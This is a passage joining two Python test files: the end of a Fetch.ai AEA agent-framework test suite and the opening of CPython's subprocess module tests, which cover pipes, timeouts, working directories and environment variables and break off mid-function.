dummy_skill = aea.resources.get_skill(DUMMY_SKILL_PUBLIC_ID)
dummy_handler = dummy_skill.handlers["dummy"]
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
message_bytes = DefaultSerializer().encode(msg)
envelope = Envelope(
to=aea.identity.address,
sender=aea.identity.address,
protocol_id=UNKNOWN_PROTOCOL_PUBLIC_ID,
message=message_bytes,
)
# send envelope via localnode back to agent
aea.outbox.put(envelope)
time.sleep(2.0)
assert len(dummy_handler.handled_messages) == 1
# DECODING ERROR
envelope = Envelope(
to=aea.identity.address,
sender=aea.identity.address,
protocol_id=DefaultMessage.protocol_id,
message=b"",
)
# send envelope via localnode back to agent
aea.outbox.put(envelope)
time.sleep(2.0)
assert len(dummy_handler.handled_messages) == 2
# UNSUPPORTED SKILL
msg = FipaSerializer().encode(
FipaMessage(
performative=FipaMessage.Performative.ACCEPT,
message_id=1,
dialogue_reference=(str(0), ""),
target=0,
)
)
envelope = Envelope(
to=aea.identity.address,
sender=aea.identity.address,
protocol_id=FipaMessage.protocol_id,
message=msg,
)
# send envelope via localnode back to agent
aea.outbox.put(envelope)
time.sleep(2.0)
assert len(dummy_handler.handled_messages) == 3
finally:
aea.stop()
t.join()
class TestInitializeAEAProgrammaticallyFromResourcesDir:
"""Test that we can initialize the agent by providing the resource object loaded from dir."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.node = LocalNode()
cls.node.start()
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(FETCHAI, private_key_path)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
cls.aea = builder.build(
connection_ids=[PublicId.from_str("fetchai/local:0.1.0")]
)
list(cls.aea._connections)[0]._local_node = cls.node
cls.expected_message = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
cls.expected_message.counterparty = cls.aea.identity.address
envelope = Envelope(
to=cls.aea.identity.address,
sender=cls.aea.identity.address,
protocol_id=DefaultMessage.protocol_id,
message=DefaultSerializer().encode(cls.expected_message),
)
cls.t = Thread(target=cls.aea.start)
cls.t.start()
time.sleep(0.5)
cls.aea.outbox.put(envelope)
time.sleep(0.5)
def test_initialize_aea_programmatically(self):
"""Test that we can initialize an AEA programmatically."""
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
dummy_behaviour_name = "dummy"
dummy_behaviour = self.aea.resources.get_behaviour(
dummy_skill_id, dummy_behaviour_name
)
assert dummy_behaviour is not None
assert dummy_behaviour.nb_act_called > 0
# TODO the previous code caused an error:
# _pickle.PicklingError: Can't pickle <class 'tasks.DummyTask'>: import of module 'tasks' failed
dummy_task = DummyTask()
task_id = self.aea.task_manager.enqueue_task(dummy_task)
async_result = self.aea.task_manager.get_task_result(task_id)
expected_dummy_task = async_result.get(2.0)
assert expected_dummy_task.nb_execute_called > 0
dummy_handler = self.aea.resources.get_handler(
DefaultMessage.protocol_id, dummy_skill_id
)
dummy_handler_alt = self.aea.resources._handler_registry.fetch(
(dummy_skill_id, "dummy")
)
assert dummy_handler == dummy_handler_alt
assert dummy_handler is not None
assert len(dummy_handler.handled_messages) == 1
assert dummy_handler.handled_messages[0] == self.expected_message
@classmethod
def teardown_class(cls):
"""Tear the test down."""
cls.aea.stop()
cls.t.join()
cls.node.stop()
class TestInitializeAEAProgrammaticallyBuildResources:
"""Test that we can initialize the agent by building the resource object."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.node = LocalNode()
cls.node.start()
cls.agent_name = "MyAgent"
cls.private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
cls.wallet = Wallet({FETCHAI: cls.private_key_path})
cls.ledger_apis = LedgerApis({}, FETCHAI)
cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])
cls.connection = _make_local_connection(cls.agent_name, cls.node)
cls.connections = [cls.connection]
cls.temp = tempfile.mkdtemp(prefix="test_aea_resources")
cls.resources = Resources(cls.temp)
cls.default_protocol = Protocol.from_dir(
str(Path(AEA_DIR, "protocols", "default"))
)
cls.resources.add_protocol(cls.default_protocol)
cls.error_skill = Skill.from_dir(str(Path(AEA_DIR, "skills", "error")))
cls.dummy_skill = Skill.from_dir(str(Path(CUR_PATH, "data", "dummy_skill")))
cls.resources.add_skill(cls.dummy_skill)
cls.resources.add_skill(cls.error_skill)
cls.aea = AEA(
cls.identity,
cls.connections,
cls.wallet,
cls.ledger_apis,
resources=cls.resources,
)
cls.error_skill.skill_context.set_agent_context(cls.aea.context)
cls.dummy_skill.skill_context.set_agent_context(cls.aea.context)
default_protocol_id = DefaultMessage.protocol_id
cls.expected_message = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
cls.expected_message.counterparty = cls.agent_name
cls.t = Thread(target=cls.aea.start)
cls.t.start()
time.sleep(0.5)
cls.aea.outbox.put(
Envelope(
to=cls.agent_name,
sender=cls.agent_name,
protocol_id=default_protocol_id,
message=DefaultSerializer().encode(cls.expected_message),
)
)
def test_initialize_aea_programmatically(self):
"""Test that we can initialize an AEA programmatically."""
time.sleep(0.5)
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
dummy_behaviour_name = "dummy"
dummy_behaviour = self.aea.resources.get_behaviour(
dummy_skill_id, dummy_behaviour_name
)
assert dummy_behaviour is not None
assert dummy_behaviour.nb_act_called > 0
dummy_task = DummyTask()
task_id = self.aea.task_manager.enqueue_task(dummy_task)
async_result = self.aea.task_manager.get_task_result(task_id)
expected_dummy_task = async_result.get(2.0)
assert expected_dummy_task.nb_execute_called > 0
dummy_handler_name = "dummy"
dummy_handler = self.aea.resources._handler_registry.fetch(
(dummy_skill_id, dummy_handler_name)
)
dummy_handler_alt = self.aea.resources.get_handler(
DefaultMessage.protocol_id, dummy_skill_id
)
assert dummy_handler == dummy_handler_alt
assert dummy_handler is not None
assert len(dummy_handler.handled_messages) == 1
assert dummy_handler.handled_messages[0] == self.expected_message
@classmethod
def teardown_class(cls):
"""Tear the test down."""
cls.aea.stop()
cls.t.join()
cls.node.stop()
Path(cls.temp).rmdir()
class TestAddBehaviourDynamically:
"""Test that we can add a behaviour dynamically."""
@classmethod
def setup_class(cls):
"""Set the test up."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
wallet = Wallet({FETCHAI: private_key_path})
ledger_apis = LedgerApis({}, FETCHAI)
resources = Resources()
resources.add_component(Skill.from_dir(Path(CUR_PATH, "data", "dummy_skill")))
identity = Identity(agent_name, address=wallet.addresses[FETCHAI])
cls.input_file = tempfile.mkstemp()[1]
cls.output_file = tempfile.mkstemp()[1]
cls.agent = AEA(
identity,
[_make_local_connection(identity.address, LocalNode())],
wallet,
ledger_apis,
resources,
)
for skill in resources.get_all_skills():
skill.skill_context.set_agent_context(cls.agent.context)
cls.t = Thread(target=cls.agent.start)
cls.t.start()
time.sleep(1.0)
def test_add_behaviour_dynamically(self):
"""Test the dynamic registration of a behaviour."""
dummy_skill_id = PublicId("dummy_author", "dummy", "0.1.0")
dummy_skill = self.agent.resources.get_skill(dummy_skill_id)
assert dummy_skill is not None
new_behaviour = DummyBehaviour(
name="dummy2", skill_context=dummy_skill.skill_context
)
dummy_skill.skill_context.new_behaviours.put(new_behaviour)
time.sleep(1.0)
assert new_behaviour.nb_act_called > 0
assert len(self.agent.resources.get_behaviours(dummy_skill_id)) == 2
@classmethod
def teardown_class(cls):
"""Tear the class down."""
cls.agent.stop()
cls.t.join()
Path(cls.input_file).unlink()
Path(cls.output_file).unlink()
|
test_subprocess.py
|
import unittest
from test.support import script_helper
from test import support
import subprocess
import sys
import signal
import io
import locale
import os
import errno
import tempfile
import time
import re
import selectors
import sysconfig
import warnings
import select
import shutil
import gc
import textwrap
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
try:
mkstemp = tempfile.mkstemp
except AttributeError:
# tempfile.mkstemp is not available
def mkstemp():
"""Replacement for mkstemp, calling mktemp."""
fname = tempfile.mktemp()
return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(FileNotFoundError, self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_ouput(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
